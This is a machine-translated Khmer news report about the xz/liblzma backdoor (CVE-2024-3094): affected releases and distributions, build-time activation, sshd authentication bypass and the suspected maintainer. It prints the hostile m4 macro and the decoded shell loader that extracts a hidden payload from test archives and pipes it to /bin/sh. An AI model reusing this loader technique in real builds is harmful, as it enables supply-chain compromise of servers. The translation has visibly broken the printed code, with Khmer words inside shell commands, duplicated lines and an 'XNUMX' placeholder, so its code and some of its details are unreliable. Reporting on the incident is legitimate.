Backdoor ត្រូវបានរកឃើញនៅក្នុងបណ្ណាល័យ xz/liblzma ដែលអនុញ្ញាតឱ្យចូលតាមរយៈ sshd

នៅក្នុងកញ្ចប់ XZ Utils ដែលរួមបញ្ចូលបណ្ណាល័យ liblzma និងឧបករណ៍ប្រើប្រាស់សម្រាប់ធ្វើការជាមួយទិន្នន័យដែលបានបង្ហាប់ក្នុងទម្រង់ “.xz” ទ្វារខាងក្រោយ (CVE-2024-3094) ត្រូវបានកំណត់អត្តសញ្ញាណដែលអនុញ្ញាតឱ្យស្ទាក់ចាប់ និងកែប្រែទិន្នន័យដែលបានដំណើរការដោយកម្មវិធីដែលពាក់ព័ន្ធ។ ជាមួយបណ្ណាល័យ liblzma ។ គោលដៅសំខាន់នៃ backdoor គឺម៉ាស៊ីនមេ OpenSSH ដែលនៅក្នុងការចែកចាយមួយចំនួនត្រូវបានរួមបញ្ចូលជាមួយបណ្ណាល័យ libsystemd ដែលនៅក្នុងវេនប្រើ liblzma ។ ការភ្ជាប់ sshd ជាមួយបណ្ណាល័យដែលងាយរងគ្រោះអនុញ្ញាតឱ្យអ្នកវាយប្រហារអាចចូលប្រើម៉ាស៊ីនមេ SSH ដោយមិនចាំបាច់មានការផ្ទៀងផ្ទាត់។

Backdoor មានវត្តមាននៅក្នុងការចេញផ្សាយផ្លូវការ 5.6.0 និង 5.6.1 ដែលបានចេញផ្សាយនៅថ្ងៃទី 24 ខែកុម្ភៈ និងថ្ងៃទី 9 ខែមីនា ដែលគ្រប់គ្រងចូលទៅក្នុងការចែកចាយ និងឃ្លាំងមួយចំនួន ឧទាហរណ៍ Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide និង 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing។ អ្នកប្រើប្រាស់ទាំងអស់នៃការចេញផ្សាយ xz 5.6.0 និង 5.6.1 ត្រូវបានណែនាំអោយវិលត្រលប់ទៅកំណែ 5.4.6 ជាបន្ទាន់។

ក្នុងចំណោមកត្តាដែលកាត់បន្ថយបញ្ហា វាអាចត្រូវបានកត់សម្គាល់ថាកំណែរបស់ liblzma ជាមួយ backdoor មិនបានគ្រប់គ្រងដើម្បីក្លាយជាផ្នែកមួយនៃការចេញផ្សាយដែលមានស្ថេរភាពនៃការចែកចាយធំនោះទេ ប៉ុន្តែប៉ះពាល់ដល់ openSUSE Tumbleweed និង Fedora 40-beta ។ Arch Linux និង Gentoo បានប្រើកំណែដែលងាយរងគ្រោះនៃ zx ប៉ុន្តែមិនងាយទទួលការវាយប្រហារទេ ដោយសារតែពួកគេមិនអនុវត្តបំណះ systemd-notify ទៅ openssh ដែលបណ្តាលឱ្យ sshd ត្រូវបានភ្ជាប់ទៅ liblzma ។ Backdoor ប៉ះពាល់តែប្រព័ន្ធ x86_64 ដោយផ្អែកលើខឺណែលលីនុច និងបណ្ណាល័យ Glibc C ប៉ុណ្ណោះ។

លេខកូដធ្វើឱ្យសកម្ម backdoor ត្រូវបានលាក់នៅក្នុងម៉ាក្រូ m4 ពីឯកសារ build-to-host.m4 ដែលប្រើដោយ automake toolkit នៅពេលសាងសង់។ កំឡុងពេលជួបប្រជុំគ្នា កំឡុងពេលអនុវត្តប្រតិបត្តិការដែលស្មុគ្រស្មាញដោយផ្អែកទៅលើបណ្ណសារ (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) ដែលប្រើដើម្បីសាកល្បងភាពត្រឹមត្រូវនៃប្រតិបត្តិការ ឯកសារវត្ថុដែលមានកូដព្យាបាទត្រូវបានបង្កើត ដែលត្រូវបានបញ្ចូលក្នុង បណ្ណាល័យ liblzma និងបានផ្លាស់ប្តូរតក្កវិជ្ជាប្រតិបត្តិការមួយចំនួននៃមុខងាររបស់វា។ ម៉ាក្រូ m4 ដែលធ្វើឱ្យសកម្ម Backdoor ត្រូវបានរួមបញ្ចូលនៅក្នុង tarballs ដែលត្រូវបានចេញផ្សាយ ប៉ុន្តែមិនមាននៅក្នុងឃ្លាំង Git ទេ។ ក្នុងពេលជាមួយគ្នានោះ បណ្ណសារសាកល្បងព្យាបាទមានវត្តមាននៅក្នុងឃ្លាំង ពោលគឺឧ។ អ្នកដែលអនុវត្ត backdoor មានសិទ្ធិចូលប្រើទាំងឃ្លាំង និងដំណើរការបង្កើតការចេញផ្សាយ។

នៅពេលប្រើ liblzma នៅក្នុងកម្មវិធី ការផ្លាស់ប្តូរព្យាបាទអាចត្រូវបានប្រើដើម្បីស្ទាក់ចាប់ ឬកែប្រែទិន្នន័យ ឬប៉ះពាល់ដល់ប្រតិបត្តិការរបស់ sshd ។ ជាពិសេស កូដព្យាបាទបានបន្លំមុខងារ RSA_public_decrypt ដើម្បីរំលងដំណើរការផ្ទៀងផ្ទាត់ sshd ។ Backdoor រួមបញ្ចូលការការពារពីការរកឃើញ និងមិនបង្ហាញខ្លួនវានៅពេលដែលអថេរបរិស្ថាន LANG និង TERM ត្រូវបានកំណត់ (ឧ. នៅពេលដំណើរការដំណើរការនៅក្នុងស្ថានីយ) ហើយអថេរបរិស្ថាន LD_DEBUG និង LD_PROFILE មិនត្រូវបានកំណត់ទេ ហើយក៏ត្រូវបានធ្វើឱ្យសកម្មតែនៅពេលប្រតិបត្តិ /usr/sbin/sshd ឯកសារដែលអាចប្រតិបត្តិបាន។ Backdoor ក៏មានមធ្យោបាយស្វែងរកការប្រតិបត្តិនៅក្នុងបរិស្ថានបំបាត់កំហុសផងដែរ។

ជាពិសេស ឯកសារ m4/build-to-host.m4 បានប្រើ gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev/ null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

នៅក្នុងការសាងសង់ដំបូង ប្រតិបត្តិការ grep បានរកឃើញឯកសារ tests/files/bad-3-corrupt_lzma2.xz ដែលនៅពេលពន្លា បានបង្កើតស្គ្រីប៖ ####Hello#### #345U211267$^D330^W [ ! $(uname) = "លីនុច" ] && ចេញ 0 [ ! $(uname) = "លីនុច" ] && ចេញ 0 [ ! $(uname) = "លីនុច" ] && ចេញ 0 [ ! $(uname) = "លីនុច" ] && ចេញ 0 [ ! $(uname) = "Linux" ] && exit 0 eval `grep ^srcdir= config.status` ប្រសិនបើ test -f ../../config.status;then eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdir» fi នាំចេញ i=»((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head - c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head - c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/ dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ( head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && ក្បាល -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F raw —lzma1 -dc|/bin/sh ####World####

របៀបដែលអ្នកវាយប្រហារគ្រប់គ្រងដើម្បីទទួលបានការចូលទៅកាន់ហេដ្ឋារចនាសម្ព័ន្ធនៃគម្រោង xz មិនទាន់ត្រូវបានបញ្ជាក់ឱ្យបានពេញលេញនៅឡើយទេ។ វាក៏មិនទាន់ច្បាស់ថាចំនួនអ្នកប្រើប្រាស់ និងគម្រោងត្រូវបានសម្របសម្រួលជាលទ្ធផលនៃ backdoor នោះទេ។ អ្នកនិពន្ធដែលត្រូវបានចោទប្រកាន់នៃ backdoor (JiaT75 - Jia Tan) ដែលបានបង្ហោះប័ណ្ណសារដែលមានលេខកូដព្យាបាទនៅក្នុងឃ្លាំងបានឆ្លើយតបជាមួយអ្នកអភិវឌ្ឍន៍ Fedora ហើយបានផ្ញើសំណើទាញទៅ Debian ទាក់ទងនឹងការផ្លាស់ប្តូរនៃការចែកចាយទៅសាខា xz 5.6.0 ហើយមិនបាន ធ្វើឱ្យមានការសង្ស័យ ចាប់តាំងពីគាត់បានចូលរួមនៅក្នុង xz ត្រូវបានអភិវឌ្ឍអស់រយៈពេល XNUMX ឆ្នាំមកហើយ ហើយជាអ្នកអភិវឌ្ឍន៍ទីពីរទាក់ទងនឹងចំនួននៃការផ្លាស់ប្តូរដែលបានធ្វើ។ បន្ថែមពីលើគម្រោង xz អ្នកនិពន្ធដែលត្រូវបានចោទប្រកាន់នៃ backdoor ក៏បានចូលរួមក្នុងការអភិវឌ្ឍន៍កញ្ចប់ xz-java និង xz-embedded ។ លើសពីនេះទៅទៀត Jia Tan ពីរបីថ្ងៃមុនត្រូវបានបញ្ចូលក្នុងចំនួនអ្នកថែទាំនៃគម្រោង XZ Embedded ដែលប្រើក្នុងខឺណែលលីនុច។

ការផ្លាស់ប្តូរព្យាបាទត្រូវបានរកឃើញបន្ទាប់ពីការវិភាគការប្រើប្រាស់ស៊ីភីយូច្រើនពេក និងកំហុសដែលបង្កើតដោយ valgrind នៅពេលភ្ជាប់តាមរយៈ ssh ទៅប្រព័ន្ធដែលមានមូលដ្ឋានលើដេបៀន។ គួរកត់សម្គាល់ថាការចេញផ្សាយ xz 5.6.1 រួមបញ្ចូលការផ្លាស់ប្តូរដែលរៀបចំដោយអ្នកនិពន្ធដែលត្រូវបានចោទប្រកាន់នៃ backdoor ក្នុងការឆ្លើយតបទៅនឹងការត្អូញត្អែរអំពីការយឺតយ៉ាវ sshd និងការគាំងដែលកើតឡើងបន្ទាប់ពីការធ្វើឱ្យប្រសើរឡើងទៅកំណែ zx 5.6.0 ជាមួយនឹង backdoor ។ លើសពីនេះទៀត កាលពីឆ្នាំមុន Jia Tan បានធ្វើការផ្លាស់ប្តូរដែលមិនឆបគ្នាជាមួយនឹងរបៀបត្រួតពិនិត្យ "-fsanitize=address" ដែលបណ្តាលឱ្យវាត្រូវបានបិទកំឡុងពេលធ្វើតេស្ត fuzz ។

ប្រភព: opennet.ru